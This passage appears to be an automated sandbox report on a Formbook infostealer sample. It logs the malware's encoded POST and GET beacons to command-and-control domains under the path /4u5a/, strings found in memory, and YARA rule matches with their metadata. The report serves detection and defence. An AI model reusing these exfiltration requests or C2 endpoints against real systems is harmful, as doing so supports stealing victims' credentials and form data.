34 53 58 4f 43 41 4a 55 6d 4d 51 65 57 63 59 31 44 75 74 47 61 2d 4b 68 64 6f 56 56 48 4c 4c 37 43 6c 70 5a 51 39 4d 66 38 64 44 48 59 49 52 52 7a 56 70 64 53 33 7e 50 7e 4c 36 71 55 5a 71 4b 4e 67 77 48 38 77 43 34 61 71 59 47 45 7a 34 61 31 36 65 51 44 44 5a 59 46 4c 57 71 36 68 42 65 45 48 47 76 4d 4c 68 65 4f 63 75 51 36 41 4e 31 67 79 57 6a 4b 70 4b 71 78 50 78 70 4b 31 44 77 46 44 67 31 42 46 58 6a 46 6e 6f 31 6a 72 45 46 47 58 6b 58 6f 48 58 70 33 5a 51 62 5a 73 4c 51 31 69 71 57 44 6a 55 34 41 53 42 41 52 6e 6b 32 31 64 4d 43 67 4e 7a 39 45 61 46 67 57 62 67 69 53 53 42 55 4a 59 38 70 57 42 43 79 71 51 6c 66 38 43 44 61 42 39 42 6e 6e 77 36 50 41 78 62 72 67 6c 4a 43 32 42 33 42 28 57 64 38 66 36 51 77 32 6f 42 56 49 46 6e 74 50 77 7e 4c 34 6e 68 7a 71 51 58 50 34 61 78 46 46 32 43 47 4d 54 37 44 6d 72 45 34 42 51 39 4d 31 68 77 43 4a 77 47 65 61 57 61 42 46 72 69 46 51 7a 72 2d 37 58 66 30 7e 6c 55 6b 76 71 6d 6e 75 65 63 6b 51 5f 37 4b 46 77 68 36 4d 64 72 61 76 4d 71 41 61 41 62 7a 4a 79 5a 7a 68 41 61 6a 38 50 67 53 49 63 37 4a 6e 70 
49 7a 67 46 4c 30 79 5a 77 6e 7a 65 35 37 4b 50 30 4d 6f 4e 38 5a 52 32 71 32 51 37 7a 49 35 58 4c 62 6a 52 71 44 6b 4d 7a 63 70 55 68 6c 45 43 44 52 61 6a 71 6c 41 49 5a 59 35 63 56 6f 55 58 6d 4f 6b 6a 68 63 77 42 31 38 68 4b 71 49 55 54 73 47 6f 47 67 4e 67 2d 52 74 30 55 51 70 47 64 67 69 43 6b 7e 72 6d 45 57 56 35 62 7e 37 34 59 6f 6c 64 69 68 44 42 38 4f 4f 36 2d 62 35 64 58 72 66 42 51 57 4b 45 74 45 6c 42 77 52 33 70 7a 58 49 45 6b 46 41 7e 48 41 4b 47 44 48 45 73 66 63 79 6a 43 72 7a 61 76 6c 4f 4d 6e 58 41 69 7a 71 53 65 41 35 41 28 4b 41 72 4a 5f 45 74 42 4e 55 38 68 2d 4e 4b 70 62 4b 6c 32 53 47 37 6a 55 31 56 31 4c 31 62 5a 57 76 30 57 41 75 44 38 61 52 6a 46 4a 71 48 41 51 6a 67 34 6f 34 69 4b 4e 6b 7a 69 7a 79 42 42 4d 44 67 39 37 45 47 64 64 4f 68 52 4b 76 7a 30 79 74 77 4b 51 70 39 35 68 6e 76 73 72 64 52 66 4c 77 63 57 41 30 35 34 33 4c 37 41 71 5a 32 49 78 4f 2d 37 41 34 4f 68 46 70 66 42 71 56 56 62 2d 6d 53 32 64 33 31 39 58 33 38 49 76 7a 6d 75 65 65 46 49 62 52 50 34 45 73 67 6e 39 50 44 5
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 56 72 6c 6a 58 30 75 59 78 51 47 67 68 65 38 55 35 62 35 6e 4e 78 7e 50 47 6e 53 62 67 63 4c 57 44 4f 6f 73 68 59 53 37 67 35 48 6a 4f 35 76 6e 77 32 67 62 70 43 31 7a 58 50 49 72 4a 49 57 52 74 4a 44 68 34 72 56 4b 53 6a 75 55 78 6f 28 45 50 48 7e 52 4b 65 65 34 77 4b 44 37 77 6a 33 78 69 31 6b 4e 63 66 4c 72 68 63 65 44 74 72 37 36 57 31 61 6b 4c 31 77 67 37 77 6f 4f 61 58 46 57 6a 6b 36 73 64 2d 36 45 39 32 43 49 42 2d 4d 77 72 2d 53 36 76 4e 76 6c 76 4b 51 77 53 78 52 44 45 76 45 39 4a 57 46 32 61 36 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=z1yV~d~FGj03VrljX0uYxQGghe8U5b5nNx~PGnSbgcLWDOoshYS7g5HjO5vnw2gbpC1zXPIrJIWRtJDh4rVKSjuUxo(EPH~RKee4wKD7wj3xi1kNcfLrhceDtr76W1akL1wg7woOaXFWjk6sd-6E92CIB-Mwr-S6vNvlvKQwSxRDEvE9JWF2a6o.
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 7a 31 79 56 7e 64 7e 46 47 6a 30 33 55 4f 74 6a 62 33 57 59 6b 67 47 6a 74 2d 38 55 7a 37 35 6a 4e 78 69 50 47 69 72 65 68 76 6e 57 44 63 41 73 67 36 36 37 69 35 48 6a 49 35 76 6a 75 47 67 7a 70 43 68 56 58 4b 6b 37 4a 4b 61 52 75 71 37 68 7e 76 31 4a 5a 7a 75 57 6d 34 28 48 50 48 28 4a 4b 65 4f 38 77 4b 57 67 77 6a 28 78 69 48 4d 4e 4d 5f 4c 6f 38 73 65 44 74 72 36 6f 57 31 61 49 4c 78 63 6f 37 78 41 65 5a 6d 31 57 6a 41 75 73 62 70 57 62 37 32 43 4d 49 65 4e 46 67 2d 76 6c 6b 65 36 31 71 37 49 43 42 77 4a 41 49 38 35 35 5a 6c 51 31 50 50 70 6e 35 2d 78 33 31 46 53 32 64 63 4f 5a 7a 42 6d 74 56 6b 70 6d 50 67 4f 63 5a 75 7e 4a 58 6f 58 57 77 74 73 32 7e 73 37 53 69 66 7e 74 36 4a 42 4e 62 6b 65 6b 4f 6f 5a 61 55 55 71 54 71 66 70 68 54 32 63 50 65 4c 47 43 66 51 6c 77 65 7a 49 75 34 6f 66 50 50 79 65 48 5a 37 78 5a 42 46 67 30 65 2d 59 44 30 6d 54 5a 4f 54 50 68 42 32 33 78 71 48 34 4a 55 34 53 7a 42 7a 78 61 69 73 41 47 7a 6f 55 66 45 6a 28 52 6b 32 56 41 31 59 4b 52 32 56 7a 68 50 6a 6b 6b 74 43 44 72 78 4c 5a 32 76 78 7a 74 51 53 63 74 65 42 5a 45 57 59 6a 65 37 69 55 71 67 73 52 4d 42 51 7e 46 33 33 48 50 49 6b 32 38 6f 30 71 55 31 64 4c 54 69 6b 42 52 61 54 56 6c 36 74 35 48 39 77 54 59 71 59 74 38 65 69 46 6d 6a 33 75 41 4a 67 37 35 43 37 34 35 73 39 33 30 76 46 4b 51 5a 70 59 59 59 42 48 4c 30 65 46 34 52 44 36 51 55 65 75 33 38 79 50 32 6e 6a 45 74 48 51 47 33 76 56 77 77 7e 30 70 5f 6b 6f 55 58 65 54 52 62 47 55 55 54 64 70 53 47 58 4f 70 70 79 61 78 68 4d 58 4b 6c 61 65 77 4a 6b 68 7e 4d 56 70 50 4c 70 
41 55 58 37 4b 6f 6b 75 31 47 65 32 42 48 52 39 5f 76 74 61 59 67 6b 65 74 28 5f 52 76 46 52 4d 52 70 64 62 4e 4a 57 47 70 61 6f 30 33 37 6e 79 43 64 57 4c 32 71 75 4b 30 79 4d 57 36 34 6f 61 42 6d 65 44 43 34 34 49 39 44 46 77 39 4f 6c 62 62 67 57 34 47 6d 2d 32 65 70 78 62 32 54 5a 4b 32 28 67 72 76 6e 30 68 48 31 69 6b 72 70 34 47 48 44 73 58 4d 57 52 31 68 68 57 32 55 7a 55 31 45 57 63 36 35 75 6c 70 36 32 4b 32 4f 75 7a 4b 4a 34 46 77 57 28 51 51 41 61 4f 7e 56 44 45 48 73 78 4a 34 43 6d 38 38 35 6a 64 72 4e 58 4c 6e 50 6f 46 31 33 52 5a 53 6b 33 62 51 4b 67 4e 64 4f 79 4c 35 71 53 49 6d 49 35 75 72 61 71 6d 5a 54 46 70 54 48 53 57 38 58 59 43 76 37 73 37 71 6a 31 37 75 75 30 75 79 70 38 49 58 6f 52 43 6d 36 28 6c 7a 4f 47 59 28 34 49 6a 6a 36 71 4b 52 5f 6f 51 74 66 33 41 6b 62 4a 33 77 6b 56 55 4f 6d 45 68 37 6f 57 48 33 61 78 73 55 31 47 64 37 46 73 39 68 45 56 33 63 54 32 33 36 75 41 53 37 5f 33 53 64 49 67 42 6c 6d 67 52 4b 46 63 42 28 76 79 73 53 33 6d 4f 7e 6c 57 6d 59 52 58 33 62 37 58 75 4a 48 71 6
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.canadianlocalbusiness.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.canadianlocalbusiness.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 67 43 4f 73 59 4c 4b 6b 4a 51 47 58 76 58 46 49 49 45 70 38 35 54 65 6a 39 36 75 2d 35 6b 7a 72 58 62 7a 39 43 75 79 6b 45 4a 70 77 61 34 59 35 72 6b 73 4e 7e 48 38 6a 4f 42 62 58 62 58 4d 44 74 67 45 7a 58 30 33 41 6a 6e 59 52 62 30 55 76 54 4b 36 5a 37 31 59 51 6c 45 58 6e 69 51 49 45 74 64 51 5f 73 75 47 50 39 46 6f 4b 42 34 53 4e 61 56 4a 4d 71 6e 61 74 79 76 70 64 73 4f 76 33 6e 69 7a 51 64 33 34 76 68 6d 45 35 67 72 64 6c 36 2d 38 5a 7e 4f 73 6a 63 50 46 64 28 72 6f 58 46 43 34 31 55 52 49 6a 45 31 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
      Source: global traffic; HTTP traffic detected:
        POST /4u5a/ HTTP/1.1
        Host: www.canadianlocalbusiness.com
        Connection: close
        Content-Length: 1454
        Cache-Control: no-cache
        Origin: http://www.canadianlocalbusiness.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.canadianlocalbusiness.com/4u5a/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 29 Nov 2022 17:25:07 GMT
        Content-Type: text/html
        Content-Length: 146
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx/1.14.0 (Ubuntu)
        Date: Tue, 29 Nov 2022 17:25:25 GMT
        Content-Type: text/html
        Content-Length: 178
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 29 Nov 2022 17:11:54 GMT
        Content-Type: text/html
        Content-Length: 146
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 29 Nov 2022 17:12:05 GMT
        Content-Type: text/html
        Content-Length: 146
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Tue, 29 Nov 2022 17:12:07 GMT
        Content-Type: text/html
        Content-Length: 146
        Connection: close
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:25:51 GMT
        Server: Apache
        Content-Length: 1080
        Connection: close
        Content-Type: text/html
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:25:53 GMT
        Server: Apache
        Content-Length: 1080
        Connection: close
        Content-Type: text/html
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:25:56 GMT
        Server: Apache
        Content-Length: 1080
        Connection: close
        Content-Type: text/html; charset=utf-8
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:26:02 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 771d0bc54f76cb33-DUS
        Content-Encoding: gzip
        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:26:04 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 771d0bd20dfdcb0d-DUS
        Content-Encoding: gzip
        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Date: Tue, 29 Nov 2022 17:26:06 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Vary: Accept-Encoding
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 771d0bdedcba9b83-FRA
        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmp; String found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: 1--Lt08NN.10.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknown; HTTP traffic detected:
        POST /4u5a/ HTTP/1.1
        Host: www.dersameh.com
        Connection: close
        Content-Length: 190
        Cache-Control: no-cache
        Origin: http://www.dersameh.com
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Referer: http://www.dersameh.com/4u5a/
        Accept-Language: en-US
        Accept-Encoding: gzip, deflate
        Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: unknown; DNS traffic detected: queries for: www.ope-cctv.com
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1
        Host: www.ope-cctv.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1
        Host: www.dersameh.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1
        Host: www.darkchocolatebliss.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1
        Host: www.y31jaihdb6zm87.buzz
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1
        Host: www.marketmall.digital
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:
      Source: global traffic; HTTP traffic detected:
        GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1
        Host: www.canadianlocalbusiness.com
        Connection: close
        Data Raw: 00 00 00 00 00 00 00
        Data Ascii:

      E-Banking Fraud

      Source: Yara match; File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
